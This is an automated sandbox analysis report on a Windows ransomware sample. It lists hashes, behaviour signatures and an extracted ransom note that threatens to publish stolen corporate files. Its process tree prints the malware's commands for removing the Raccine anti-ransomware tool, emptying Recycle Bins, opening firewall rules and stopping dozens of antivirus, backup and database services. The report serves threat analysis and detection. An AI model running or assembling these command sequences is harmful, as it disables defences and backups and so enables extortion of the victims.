Analysis
-
max time kernel
116s -
max time network
145s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
28-05-2021 09:57
General
-
Target
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe
-
Size
108KB
-
MD5
f06010cbf89e396a78cebfd0456e1859
-
SHA1
33306e22ac0fa20a49cbbce252e08be91ac4414b
-
SHA256
5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4
-
SHA512
08d1aed5b3b797000fcf1005e5b3a4d991e0c68de0ec297238bc2822fe9d21d19d599f892aef7369cca8d2a5dca2dfac73fcf7441429153a66aa58a2039f1f29
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
Ransom Note
Don't worry, you can return all your files!!
All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation.
To get this software you need write on our e-mail: [email protected]
Key Identifier:
VGBD9NFnjMbVHABWIfG8imW/P5ItpPYbPpr1Ai9R5F6C4whck1fft3M9aJI17qasL/aWWLKoWmN3hPWXUTXPaQe49QyNh4Fd0I/drNIq8Evr74X+InXH09WWf8Dumy530gek4zpxPuSyEOO5NyZne9jKximCYfagIWMRVAlCX9/b0p0vPrM3nMlfCskOjN4/8cjbrbUZFqMz8sK4MedVzmpTl5mFruE+jfhJiOWDcqLLtWqudk0eMasxe9w1Zwa+vZfq+wN1BZni3BKkr0tyh67f+mt+UJrFYfGOSLX/+hx5C1gebqtoMgPb/JjWspBoj1SrtKjqL4TI//0DqV4q3AC08GtsReyAvPqf7J+M4iPKmw/9FlspAcy3b+JPyYonamnmbFynZxpvb4tRXVmJNJLyBbANBA/1mbwrQDueeO3+KNU4uSTfCwRagOG4f5yWaDguYddciikfa2FOxh3NTveAOdZSkCeAKE/UPyXbz6GCC8S3eDT8CM/zbBZ1u4rUYoGj8MB+cXkCISghrUpygcKZ1RfxPa7fkYDOLKNUBeKeHz7JGkkOTta8+FW1806ER7oAQ7mgOcYQPIvKtuyxMT1ip+cSYuaZtPbn/eguVrg0E8FzDLstbs/SO+wVeDoQzRPSFn7XpZ/n1HbCjs7Y+MOiM2HPYzN2PRaNSiYTcwo=
Emails
Extracted
Path
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
Ransom Note
Don't worry, you can return all your files!!
All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
We also downloaded your corporate files (databases, tables, accounting information, etc.) and we will have to publish them if you do not agree to cooperation.
To get this software you need write on our e-mail: [email protected]
Key Identifier:
VGBD9NFnjMbVHABWIfG8imW/P5ItpPYbPpr1Ai9R5F6C4whck1fft3M9aJI17qasL/aWWLKoWmN3hPWXUTXPaQe49QyNh4Fd0I/drNIq8Evr74X+InXH09WWf8Dumy530gek4zpxPuSyEOO5NyZne9jKximCYfagIWMRVAlCX9/b0p0vPrM3nMlfCskOjN4/8cjbrbUZFqMz8sK4MedVzmpTl5mFruE+jfhJiOWDcqLLtWqudk0eMasxe9w1Zwa+vZfq+wN1BZni3BKkr0tyh67f+mt+UJrFYfGOSLX/+hx5C1gebqtoMgPb/JjWspBoj1SrtKjqL4TI//0DqV4q3AC08GtsReyAvPqf7J+M4iPKmw/9FlspAcy3b+JPyYonamnmbFynZxpvb4tRXVmJNJLyBbANBA/1mbwrQDueeO3+KNU4uSTfCwRagOG4f5yWaDguYddciikfa2FOxh3NTveAOdZSkCeAKE/UPyXbz6GCC8S3eDT8CM/zbBZ1u4rUYoGj8MB+cXkCISghrUpygcKZ1RfxPa7fkYDOLKNUBeKeHz7JGkkOTta8+FW1806ER7oAQ7mgOcYQPIvKtuyxMT1ip+cSYuaZtPbn/eguVrg0E8FzDLstbs/SO+wVeDoQzRPSFn7XpZ/n1HbCjs7Y+MOiM2HPYzN2PRaNSiYTcwo=
Number of files that were processed is: 88
Emails
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Modifies file permissions 1 TTPs 3 IoCs
-
Windows security modification 2 TTPs 2 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 1 IoCs
-
Kills process with taskkill 48 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 51 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SendNotifyMessage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 2 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\5e088eb0eb669be278eeef2204005e705c88f5a215e985b53dc42b4f9853b4e4.bin.sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵
-
-
C:\Windows\SysWOW64\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config Dnscache start= auto2⤵
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config FDResPub start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SSDPSRV start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config upnphost start= auto2⤵
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
-
-
C:\Windows\SysWOW64\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start Dnscache /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start Dnscache /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop bedbg /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start FDResPub /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start SSDPSRV /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start SSDPSRV /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start upnphost /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start upnphost /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EhttpSrv /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EhttpSrv /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MMS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MMS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBackupSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFSGT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLWriter /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop KAVFS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop kavfsslp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPSecurityService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mozyprobackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ekrn /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
-
-
-
